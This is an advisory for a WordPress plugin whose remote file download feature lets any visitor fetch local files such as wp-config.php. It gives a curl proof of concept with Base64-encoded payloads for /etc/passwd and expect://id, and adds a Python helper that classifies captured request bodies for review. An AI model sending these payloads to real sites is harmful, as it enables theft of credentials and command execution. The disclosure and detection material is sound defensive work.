The plugin allows any visitor to use its remote file download feature to download any local file, including sensitive ones such as wp-config.php.
# Base64 encode your payload, for example
# Base64(expect://id) -> ZXhwZWN0Oi8vaWQ= (requires the "expect" PECL extension to be installed)
# Base64(/etc/passwd) -> L2V0Yy9wYXNzd2Q=
curl -v -d "dl=L2V0Yy9wYXNzd2Q=&size=200&type=text/plain" https://example.com/page
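A triage helper for captured POST bodies, added here as an example (not code from the plugin or from this advisory): it decodes the `dl` parameter used in the proof of concept and flags values that are not plain http(s) URLs. That only remote http(s) URLs are legitimate input is an assumption, as are the function name and the labels it returns.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate "remote file download" only ever targets http(s) URLs.
ALLOWED_SCHEMES = {"http", "https"}


def classify_dl(body: str) -> str:
    """Classify the `dl` parameter of a form-encoded POST body.

    Returns one of: "absent", "undecodable", "local-path",
    "wrapper:<scheme>" or "remote-url".
    """
    params = parse_qs(body, keep_blank_values=True)
    if "dl" not in params:
        return "absent"
    # Form decoding turns a raw '+' into a space; restore it before Base64 decoding.
    raw = params["dl"][0].replace(" ", "+")
    try:
        decoded = base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return "undecodable"
    parts = urlsplit(decoded)
    scheme = parts.scheme.lower()
    if not scheme:
        # No scheme at all: the value names a file on the server itself.
        return "local-path"
    if scheme in ALLOWED_SCHEMES and parts.netloc:
        return "remote-url"
    # Anything else (expect://, file://, php://, ...) is a stream wrapper.
    return f"wrapper:{scheme}"


if __name__ == "__main__":
    # Constructed sample bodies; the first two reuse the values shown in the advisory.
    benign = base64.b64encode(b"https://example.com/file.pdf").decode()
    samples = [
        "dl=L2V0Yy9wYXNzd2Q=&size=200&type=text/plain",
        "dl=ZXhwZWN0Oi8vaWQ=&size=200&type=text/plain",
        f"dl={benign}&size=200&type=application/pdf",
    ]
    for body in samples:
        print(classify_dl(body), "<-", body)
```

Anything other than `remote-url` or `absent` in request-body or WAF logs for the affected endpoint is worth reviewing.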
Raad Haddad of Cloudyrion GmbH
Raad Haddad of Cloudyrion GmbH
Yes
2022-07-12 (about 6 months ago)
2022-07-12 (about 6 months ago)
2022-08-22 (about 5 months ago)